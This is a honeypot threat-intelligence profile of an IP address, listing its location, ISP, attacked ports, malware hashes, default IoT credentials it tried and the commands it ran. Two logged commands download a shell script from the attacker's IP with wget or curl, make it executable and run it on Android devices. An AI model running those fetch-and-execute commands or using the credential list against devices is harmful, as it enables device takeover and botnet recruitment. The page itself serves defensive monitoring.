⚠TROYANOSYVIRUS
Active Threat β€’ HIGH

130.12.180.85

First Detection2/8/2026
Last Activity2/15/2026
ISPRailnet LLC
🎯
715
Total Attacks
πŸ”Œ
3
Ports
πŸ“‘
3
Attack Types
🦠
3
Malware

Geolocation

Country
πŸ‡ΊπŸ‡Έ United States
City
Unknown
ASN
AS214943
ISP
Railnet LLC

Attack Types

cowrie
adbhoney
honeytrap

Attacked Ports

2322225555

Associated Malware

2d21ee5994ccbac39371...β†’8a6ec7b5e46a3a9e5ee8...β†’e3b0c44298fc1c149afb...β†’

Attempted Credentials

πŸ”admin/admin
11x
πŸ”root/(empty)
11x
πŸ”root/root
11x
πŸ”user/user
8x
πŸ”telecomadmin/admintelecom
6x
πŸ”hikvision/hikvision
6x
πŸ”root/xc3511
6x
πŸ”admin/password
5x
πŸ”pi/raspberry
5x
πŸ”admin/admin1234
5x
πŸ”root/86981198
5x
πŸ”ubnt/ubnt
5x
πŸ”root/j1/_6s*w
5x
πŸ”admin/12345
5x
πŸ”default/default
5x

Executed Commands

$./10x
$echo SHELL_TEST7x
$cat /proc6x
$/bin/busybox TEST6x
$cd /data/local/tmp/; wget http://130.12.180.85/agent.sh || curl http://130.12.180.85/agent.sh -o agent.sh; chmod 777 agent.sh; sh agent.sh android1x
$cd /data/local/tmp/; wget http://130.12.180.85/cat.sh || curl http://130.12.180.85/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android1x

Risk Assessment

72
/100
LowMediumHighCritical